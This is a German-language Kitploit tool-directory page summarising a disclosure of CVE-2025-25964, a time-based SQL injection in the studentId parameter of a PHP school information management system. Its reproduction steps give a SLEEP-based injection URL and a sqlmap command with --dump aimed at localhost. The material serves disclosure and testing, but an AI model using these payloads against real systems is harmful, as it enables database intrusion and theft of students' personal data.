Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-25964 — Eine kritische SQL-Injection-Schwachstelle (CVE-2025-25964), entdeckt im School Information Management System v1.0 | Kitploit
Tools/GitHubGitHub/sudo-sakib/cve-2025-25964
SchwachstellenanalyseWebanwendungs-ExploitationPenetrationstestsPapers & ForschungLernen & BildungDatenbanksicherheit
GitHubsudo-sakib/cve-2025-25964

CVE-2025-25964

Eine kritische SQL-Injection-Schwachstelle (CVE-2025-25964), entdeckt im School Information Management System v1.0

Repository anzeigen
22vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-25964: SQL-Injection im School Information Management System v1.0

Einleitung

In der heutigen digitalen Landschaft ist SQL-Injection (SQLi) nach wie vor eine der häufigsten und gefährlichsten Schwachstellen in Webanwendungen. Dieser Blogbeitrag behandelt eine kritische SQL-Injection-Schwachstelle (CVE-2025-25964), die im School Information Management System v1.0 von Itsourcecode entdeckt wurde. Diese Schwachstelle ermöglicht es entfernten Angreifern, das System auszunutzen und potenziell sensible Informationen preiszugeben.

Übersicht zur Schwachstelle

CVE-ID: CVE-2025-25964

Schwachstellentyp: SQL-Injection (SQLi)

Betroffenes Produkt: Student Information Management System - v1.0

Betroffene Komponente: Parameter studentId in /columbans/admin/modules/student/index.php

Angriffsart: Remote

Schweregrad: Hoch

Entdecker: Sakib Shaikh

Schritte zur Reproduktion

Um die Auswirkungen zu demonstrieren, befolgen Sie diese Schritt-für-Schritt-Anleitung:

  1. Richten Sie die anfällige Anwendung ein: Installieren und konfigurieren Sie das School Information Management System v1.0 auf einem lokalen Server.

  2. Melden Sie sich an: Melden Sie sich mit den von Itsourcecode bereitgestellten Anmeldedaten an.

  3. Rufen Sie den anfälligen Endpunkt auf:

http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207

  1. Injizieren Sie eine SQL-Payload, um auf SQL-Injection zu testen:

http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))zKnT)

  1. Beobachten Sie die Antwort der Anwendung: Wenn das Laden der Seite 10+ Sekunden dauert, ist die SQL-Injection-Schwachstelle bestätigt. Dies beweist, dass die Backend-Datenbank die injizierte SQL-Abfrage ausführt.

  2. Verwenden Sie SQLMap zur automatisierten Ausnutzung:

root@kitploit:~
python sqlmap.py -u "http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207" \
--cookie="PHPSESSID=your_cookie_here" --risk 3 --level 3 --dbs --technique=T --dump --no-cast

Dieser Befehl versucht, Datenbanknamen, Tabellen und sensible Informationen aus dem System zu extrahieren.

Ursachenanalyse

Das Problem entsteht durch unzureichende Eingabebereinigung im Parameter studentId der Datei index.php. Wenn ein Angreifer den Parameter studentId mit bösartigen SQL-Payloads modifiziert, verarbeitet die Anwendung die Eingabe ohne ordnungsgemäße Validierung, was zu einer SQL-Injection führt.

Referenzen

https://itsourcecode.com/free-projects/php-project/st-columban-student-information-management-system/

https://owasp.org/www-community/attacks/SQL_Injection

Tool herunterladen